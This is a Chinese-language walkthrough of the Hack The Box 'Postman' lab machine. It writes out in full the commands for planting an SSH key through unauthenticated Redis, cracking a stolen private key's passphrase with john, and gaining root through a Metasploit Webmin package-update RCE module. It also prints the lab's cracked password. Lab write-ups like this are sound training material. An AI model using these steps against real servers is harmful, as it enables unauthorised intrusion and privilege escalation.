HTB-postman

端口扫描

nmap -sC -sV -oA path postman.htb
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Login to Webmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现19.1版本的webmin,但是多次测试之后发现无法似乎未开启密码重置功能。
上网看了一圈 发现nmap未扫到的redis端口

PORT     STATE SERVICE    VERSION                                
6379/tcp open  tcpwrapped    

redis 未授权访问

生成ssh公钥,写入redis

生成ssh公钥
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
写入redis
cat /root/.ssh/key.txt | redis-cli -h 10.10.10.160 -x set xxx

连接redis,导入公钥

连接redis
redis-cli -h 10.10.10.160
导入公钥
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized_keys"
save

ssh连接redis

ssh -i /root/.ssh/id_rsa [email protected]

查看一下user.txt位置

redis@Postman:/opt$ locate user.txt                   
/home/Matt/user.txt  
redis@Postman:/opt$ ls -la /home/Matt/user.txt    
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt   

获得Matt私钥

发现需要获得Matt密码,通过nmap扫描结果可以知道靶机开启了ssh,所以找找Matt的ssh私钥

redis@Postman:/opt$ locate id_rsa*                         
/opt/id_rsa.bak  
redis@Postman:/opt$ ls -la /opt/id_rsa.bak           
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak   

密码爆破

使用john在攻击机上进行密码爆破

python3 /usr/share/john/ssh2john.py Matt_pass.txt > pass
john --wordlist=/usr/share/wordlists/rockyou.txt pass

获得Matt用户密码:computer2008

切换用户,获取flag

redis@Postman:/opt$ su Matt               
Password:                                           
Matt@Postman:~$ wc -c user.txt              
33 user.txt  

获取root权限

发现webmin为19.1版本,使用msf中的模块获取root

msf5 > search webmin
msf5 exploit(linux/http/webmin_backdoor) > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > setg username Matt      
username => Matt 
msf5 exploit(linux/http/webmin_packageup_rce) > setg password computer2008 
password => computer2008  
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160 
rhosts => 10.10.10.160 

值得注意的是需要设置 ssl 为 true
否则无法建立连接

msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true 
ssl => true

获得flag

wc -c /root/root.txt
33 /root/root.txt

你可能感兴趣的:(HTB)